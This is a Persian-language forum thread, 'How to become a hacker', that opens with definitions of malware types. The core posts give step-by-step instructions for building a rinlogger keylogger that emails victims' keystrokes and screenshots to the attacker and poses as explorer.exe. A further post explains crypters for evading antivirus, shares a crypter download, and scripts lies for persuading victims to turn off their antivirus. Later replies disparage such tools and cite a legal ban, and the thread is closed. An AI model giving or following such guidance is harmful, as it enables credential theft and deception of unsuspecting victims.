آگهی افزار در هنگام اتصال به اینترنت، باعث باز شدن پیام های تبلیغی بالاپر ناخواسته (Pop-up) می شود. ه چنین ممکن است صفحه ی پیش فرض مرورگر وب (Home Page) را تغییر دهد.آگهی افزار هایی که درون یک برنامه دیگر هستند، در هنگام اتصال به اینترنت، آگهی های جدید را بارگیری کرده و درون برنامه به صورت بنرهای تبلیغاتی به نمایش در می آورند. برخی نیز آگهی افزارها و جاسوس افزارهای دیگر را بر روی سیستم بارگیری می کنند.

6. درپشتی (Backdoor)
برخی از تروجان ها، از بدافزارهایی به نام درپشتی استفاده می کنند. درپشتی ها با دور زدن روال های معمول شبکه و سیستم عامل، دسترسی های بالایی را بدون اطلاع کاربر ب مهاجم می دهند و تا حدودی مشابه نرم افزارهای مدیریت راه دور (Remote Administrator) عمل می کنند و به کمک آن ها، مهاجم می تواند تقریباً هر کاری که بخواهد بر روی رایانه قربانی انجام دهد.

7. بمب منطقی (Bomb)
بمب منطقی برنامه است که آزادانه نوشته و اصلاح می شود تا در شرایطی خاص، که غیر منتظره بوده و از جانب کاربران قانونی یا مالکین نرم افزار غیر قانونی شناخته می شوند، نتایجی را ارایه دهد. بمب های منطقی ممکن است در برنامه های مستقل مستقر شوند، یا این که ممکن است بخشی از کرم ها یا ویروس ها باشندو یک نمونه از بمب منطقی، بمب ساعتی است که در یک زمان خاص منفجر می شود.

8. کیلاگر (keylogger)
این بدافزار کلید های فشرده شده بر روی صفحه کلید را ذخیره می کند، به صورتی که می توان از آن اطلاعات تایپ شده کاربران (از قبیل رمزهای عبور) را سرقت کرد.

9. خطرافزار (Riskware)
برخی از نرم افزارها هستند که با کاربرد های مفید و بدون قصد بداندیشانه تولید می شوند؛ اما می توانند مورد سوء استفاده قرار بگیرند. این نرم افزارها به دلیل قابلیت هایی که در خود دارند به صورت بالقوه می توانند شرایط را برای تهاجم یک بدافزار فراهم کنند.
از این نرم افزارها می توان برنامه های مدیریت از راه دور (Remote Administrator) که در شبکه ها کاربرد دارند را مثال زد که در خوزه فعالیتی خود بسیار مفید هستند. این نرم افزارها می توانند به یک مدیر شبکه اجازه دسترسی به همه رایانه های متصل به شبکه را بدهند و این قابلیت را دارند که رایانه ها توسط او از طریق شبکه کنترل شود. اما در صورتی که این برنامه ها از امنیت کافی برخوردار نباشند می توانند مورد استفاده بسیاری از مهاجمان از جمله هکرها، تروجان ها و دیگز نرم افزارهای از این دست واقع شوند.

10. هرزنامه (Spam)
به هر گونه سوء استفاده از سیستم های انتقال پیام الکترونیک هرزنامه اطلاق می شود. بیش تر هرزنامه ها در قالب پیام های ناخواسته در ایمیل ها قابل مشاهده می باشند که ممکن است شمال تبلیغات، آگهی ها و تصاویر غیر اخلاقی باشد. هرزنامه ها معمولاً خطری برای رایانه ندارند، اما با انتشار و ازدیاد آن ها، کاربر را آزار می دهند.
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

تو این پست می ریم سراغ قسمت دوم یعنی کار با rinlogger

rinlogger رو از اینجا می تونین دانلود کنین.
این عکسشه.
rinlogger.png

خب مراحلو رو یک بار اینجا و بار دوم تو یک فایل zip به صورت عکس میزارم. خودتون می دونین که من با این یک سرور کیلاگر میسازم.
شروع می کنیم.
مراحل:

1. create new
2. تو قسمت email address باید یک Gmail وارد کنید. در قسمت account password، پسور Gmail خودتونو وارد کنید.
3. حالا تو قسمت smtp server تایپ کنید: smtp.gmail.com و در قسمت port بنویسین 587.
4. در قسمت keylogger recipients یک mail وار کنید که log ها به اون ارسال میشه. هر چه قدر هم خواستید وارد کنید. :D :D
5. next
6. attach screenshots = enable
7. در قسمت Send logs after each توصیه می کنم به 5 دقیقه تنظیم کنید. من خودم به 10 دقیقه میزارم چون میلم پر لاگ میشه اعصابمو خورد می کنه. البته اگه خواستین می تونین به 1 دقیقه و یا حتی به 30 ثانیه و کمتر هم بزارین.
8. حالا test connection.
9. یک پیغام میده به این صورت:
rinlogger_test_connection.png

به error توجه نکنین. :D :D :D
10. next
11. install keylogger = enable
12. installation path = application data
13. install file name = یک چیزی بزارین که تو task manager باشه مثل explorer.exe و یا vprot.exe
14. پنج بار next بزنین.
15. در قسمت mozilla firefox، هر دو گزینه رو enable کنین.
16. next
17. این صفحه اختیاری هست. اگه خواستین تغییراتو خودتون انجام بدین.
18. next
19. تو این 4 قسمت چیزایی بنویسین که زیاد ضایع نباشه که ویروسه. مثلاً در قسمت name همونو که تو مرحله ی 13 نوشتینو بنویسین.
20. next
21. آنتی ویروسو غیر فعال کنین.
22. آیکون مناسب و نام مناسب انتخاب کنین و بعدش compile.
23. تمام.

تو این فایل zip کامل توضیح دادم با عکس. :لایک یادتون نره.
اینم لینک فایل Zip:
rinlogger
 

Freemason

کاربر نیمه‌حرفه‌ای
ارسال‌ها
183
امتیاز
397
نام مرکز سمپاد
شهید مدنی
شهر
تبریز
دانشگاه
شریف
رشته دانشگاه
IT یا الکترونیک
پاسخ : چگونه هکر شویم. . . (آموزش)

تو این پست بحث آخرمونو می کنیم در مورد ویروس.
موضوع بحث crypter هست.

crypter چیست؟

Crypter تو چند کلمه میشه ابزاری برای پنهـــــان کردن Keylogger ها و Trojan ها از دید آنتی ویروس ها اســـت که در واقع هـمه کیلاگرها و تروجانها بعد از یک مدت توسط انتی ویروس ها شناسایی میشن که با این روش و با استفاده از این ابزار ها به راحتی میشه سرور کیلاگر و یا تروجان خودتون رو از دیدی انتی ویروس ها تا مدتی دور نگه دارید .

نکته : کریپتر ها فقط در یک بازه زمانی خاص توسط انتی ویروس شناسایی نمیشن و پس از مدتی شناســـایی شده و کاریی خودشون رو از دست میدن.

این تعریف کریپتر. اما...
در مبحث کریپتر باید یکم مهندسی اجتماعی قوی داشته باشین، چون کریپترها 100% مخفی نمی کنن ویروس شمارو. منظورم از مهندسی اجتماعی اینه که احیاناً اگر قربانی به شما گفت:« آنتی ویروسم بهش گیر داد. ویروسه؟». شما باید زود بگی:« نه! این نرم افزار کرک شده است (مثلاً یک patch و یا Crack) واسه همون آنتی ویروس گیر میده. آنتی ویروسو غیر فعال کن.»
خب. این از این.

حالا می ریم سراغ نرم افزار. من کریپترهایی قرار میدم تو اینجا. منبع همشونم آشیانه هست.
اولین نرم افزار:
spray crypter
پسورد: www.ashiyane.org

از 37 تا آنتی ویروس فقط یکیش سرور خروجی اونو میشناسه اونم nod 32.
من خودم اونایی که خوبن اونارو میزارم. اما اگه خواستین کاملشو داشته باشین در سایت آشیانه عضو شین.
 
ارسال‌ها
919
امتیاز
4,414
نام مرکز سمپاد
حلی
شهر
تهران
سال فارغ التحصیلی
1395
دانشگاه
تهران
پاسخ : چگونه هکر شویم. . . (آموزش)

توصیه من به جوانان این است که استفاده از این کیلاگر های آماده و کریپتر ها کسی رو هکر نمیکنه و این ها بیشترشون خودشون کیلاگرن!
حتی sql injection هم یاد بگیرید ولی برنامه نویسی بلد نباشید و با دیتابیس ها بلد نباشید کار کنید انگار هیچی!
برید زبون برنامه نویسی مث perl یا php یا امثالهم یاد بگیرید اول!
سخن حکیمانه من :
کسی که دوران راهنمایی رو نگذرونده باشه نمیتونه یه راس بره سراغ دبیرستان!
 

JB

کاربر خاک‌انجمن‌خورده
ارسال‌ها
1,447
امتیاز
4,765
نام مرکز سمپاد
هاشمی‌نژاد ۲ مشهد
دانشگاه
شهید بهشتی تهران
رشته دانشگاه
ریاضی و علوم کامپیوتر
پاسخ : چگونه هکر شویم. . . (آموزش)

این وب‌سایت علاوه بر قوانین داخلی، از قوانین جمهوری اسلامی ایران نیز تبعیت می‌کند. طبق قانون، بند ه مصادیق محتوای مجرمانه به شرح زیر است و هرگونه تخطی از آن تخلف محسوب می‌شود.

به نقل از مدیریت :
ه) محتوایی که برای ارتکاب جرایم رایانه‌ای به کار می‌رود

۱. انتشار یا توزیع ودر دسترس قراردادن یامعامله داده‌ها یانرم افزارهای که صرفاً برای ارتکاب جرایم رایانه‌ای به کار می‌رود.
۲. فروش انتشار یا در دسترس قراردادن غیرمجاز گذر واژه‌ها وداده‌هایی که امکان دسترسی غیرمجاز به داده‌ها یا سامانه‌های رایانه‌ای یا مخابراتی دولتی یاعمومی رافراهم می‌کند.
۳. انتشار یا در دسترس قراردادن محتویات آموزش دسترسی غیرمجاز، شنود غیرمجاز، جاسوسی رایانه‌ای، تحریف و اخلال در داده‌ها یا سیستم‌های رایانه‌ای و مخابراتی.
۴. آموزش و تسهیل سایر جرایم رایانه‌ای
۵. انتشار فیلتر شکن‌ها وآموزش روشهای عبور از سامانه‌های فیلترینگ
۶. انجام هرگونه فعالیت تجاری واقتصادی رایانه‌ای مجرمانه مانند شرکت‌های هرمی. (قانون اخلال در نظام اقتصادی کشور وسایر قوانین)
 
وضعیت
موضوع بسته شده است.
بالا